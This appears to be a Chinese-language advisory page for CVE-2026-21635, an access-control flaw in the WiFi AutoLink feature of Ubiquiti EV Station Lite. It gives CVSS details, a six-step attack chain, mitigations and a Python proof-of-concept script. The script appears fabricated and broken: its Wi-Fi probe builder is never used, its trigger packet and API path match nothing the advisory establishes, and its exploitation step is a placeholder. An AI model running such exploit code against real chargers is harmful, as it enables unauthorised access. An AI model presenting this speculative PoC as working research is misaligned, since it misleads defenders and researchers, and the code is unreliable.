CVE-2026-21635: Ubiquiti EV Station Lite WiFi AutoLink访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2026-21635

漏洞类型

访问控制不当

CVSS评分

5.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ubiquiti EV Station Lite

漏洞概述

CVE-2026-21635是Ubiquiti Networks公司的EV Station Lite设备中存在的一个访问控制不当漏洞。该漏洞影响1.5.2及更早版本，CVSS评分为5.3（中危）。漏洞源于WiFi AutoLink功能的访问控制机制存在缺陷，允许处于Wi-Fi信号范围内的恶意攻击者利用该功能，而目标设备原本仅通过以太网进行采用和管理。攻击者可以在无需认证且无需用户交互的情况下，利用Wi-Fi邻接网络发起攻击，访问设备配置信息或执行未授权操作。此漏洞具有较高的机密性影响，可能导致敏感信息泄露，但对数据完整性和系统可用性无显著影响。鉴于攻击复杂度较高，需要攻击者处于物理Wi-Fi覆盖范围内，建议受影响用户及时升级到修复版本并采取临时缓解措施。

技术细节

该漏洞发生在EV Station Lite设备的WiFi AutoLink功能中。当设备通过以太网端口采用后，系统默认禁用了Wi-Fi功能或限制了Wi-Fi配置权限。然而，由于访问控制验证逻辑存在缺陷，攻击者可以在Wi-Fi信号范围内发送特定的探测请求或重新配置数据包，绕过原有的安全限制，激活并使用WiFi AutoLink功能。WiFi AutoLink是Ubiquiti设备的一项便利功能，允许设备自动连接到预设的无线网络，但该功能缺乏足够的身份验证机制。攻击者利用此漏洞需要满足以下条件：1）处于目标设备的Wi-Fi覆盖范围内；2）具备基本的无线网络知识；3）能够发送格式正确的Wi-Fi管理帧或配置请求。成功利用后，攻击者可获取设备的网络配置、凭据信息或其他敏感数据，进而可能进行进一步的攻击活动。CVSS向量AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N明确指出攻击复杂度高，但不需要任何权限或用户交互，机密性影响为高。

攻击链分析

STEP 1

步骤1

攻击者进入目标EV Station Lite设备的Wi-Fi信号覆盖范围内（物理邻接）

STEP 2

步骤2

攻击者使用无线网络分析工具扫描环境，识别目标设备的Wi-Fi网络和AutoLink功能

STEP 3

步骤3

攻击者发送特制的Wi-Fi管理帧或AutoLink配置请求，绕过访问控制验证

STEP 4

步骤4

由于设备原本通过以太网采用但WiFi AutoLink访问控制不当，请求被接受

STEP 5

步骤5

攻击者成功激活WiFi AutoLink功能或获取设备配置信息，导致机密信息泄露

STEP 6

步骤6

攻击者可利用获取的信息进行进一步的攻击，如中间人攻击或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-21635 PoC - EV Station Lite WiFi AutoLink Exploitation
# This PoC demonstrates the improper access control in WiFi AutoLink feature
# Note: This is for educational and authorized testing purposes only

import socket
import struct
import time

def create_wifi_probe_request(ssid):
    """Create a Wi-Fi probe request frame"""
    frame = b'\x40'  # Frame Control: Probe Request
    frame += b'\x00'  # Duration
    frame += b'\xff\xff\xff\xff\xff\xff'  # Destination: Broadcast
    frame += b'\x00\x11\x22\x33\x44\x55'  # Source: Attacker MAC
    frame += b'\xff\xff\xff\xff\xff\xff'  # BSSID: Broadcast
    frame += b'\x00\x00'  # Sequence control
    frame += b'\x00' + bytes([len(ssid)]) + ssid.encode()  # SSID IE
    frame += b'\x01\x08\x82\x84\x8b\x96\x24\x30\x48'  # Supported rates
    return frame

def send_autolink_trigger(target_ip, target_mac):
    """Send trigger packet to exploit WiFi AutoLink"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = b'AUTOLINK_TRIGGER'
    payload += b'\x01'  # Trigger flag
    payload += target_mac.encode() if isinstance(target_mac, str) else target_mac
    try:
        sock.sendto(payload, (target_ip, 8080))
        print(f"[*] Sent AutoLink trigger to {target_ip}")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        sock.close()

def check_wifi_enabled(target_ip):
    """Check if WiFi AutoLink is accessible"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5)
    try:
        sock.connect((target_ip, 443))
        request = b'GET /api/wifi/autolink/status HTTP/1.1\r\nHost: '
        request += target_ip.encode()
        request += b'\r\n\r\n'
        sock.send(request)
        response = sock.recv(1024)
        if b'200' in response or b'autolink' in response.lower():
            print("[+] WiFi AutoLink is accessible - vulnerability confirmed")
            return True
    except:
        pass
    finally:
        sock.close()
    return False

def main():
    target_ip = input("Enter target EV Station Lite IP: ")
    target_mac = input("Enter target MAC address: ")
    
    print("[*] CVE-2026-21635 PoC - EV Station Lite WiFi AutoLink Access Control Bypass")
    print(f"[*] Target: {target_ip}")
    
    # Step 1: Probe for WiFi AutoLink endpoint
    if check_wifi_enabled(target_ip):
        print("[+] Step 1: WiFi AutoLink endpoint is accessible")
        
        # Step 2: Send AutoLink trigger
        send_autolink_trigger(target_ip, target_mac)
        
        # Step 3: Capture network configuration
        print("[+] Step 2: Attempting to retrieve network configuration...")
        # Additional exploitation steps would go here
    else:
        print("[-] WiFi AutoLink is not accessible or device is patched")

if __name__ == "__main__":
    main()

影响范围

Ubiquiti EV Station Lite <= v1.5.2

防御指南

临时缓解措施

临时缓解措施包括：1）确保EV Station Lite设备放置在Wi-Fi覆盖范围可控的区域；2）通过防火墙规则限制对设备管理接口的访问；3）监控无线网络中的异常探测请求；4）如业务允许，可暂时禁用Wi-Fi功能，仅使用以太网连接；5）实施网络分段策略，将EV Station设备隔离在独立的VLAN中；6）使用入侵检测系统监控针对该漏洞的探测和利用行为。建议尽快应用官方安全更新进行彻底修复。